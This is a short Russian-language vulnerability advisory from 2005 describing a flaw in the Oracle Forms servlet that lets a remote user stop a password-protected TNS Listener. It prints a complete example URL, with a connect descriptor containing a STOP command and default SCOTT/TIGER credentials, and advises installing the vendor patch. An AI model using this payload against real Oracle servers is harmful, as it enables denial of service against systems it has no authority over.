Повышение привилегий в Oracle Forms

Дата публикации:
10.10.2005
Всего просмотров:
1677
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Oracle Forms

Описание:
Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener.

Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. Пример:

http://[target]:8888/forms90/f90servlet?form=
test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=
(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HO ST=server)(PORT=1521)))(CONNECT_DATA=
(COMMAND=STOP)(SERVICE=LISTENER)))&
buffer_records=NO&debug_messages=NO&array=YES
& query_only=NO&quiet=NO&RENDER=YES

URL производителя: oracle.com

Решение: Установите исправление с сайта производителя.

Ссылки: Shutdown TNS Listener via Oracle Forms Servlet

или введите имя

CAPTCHA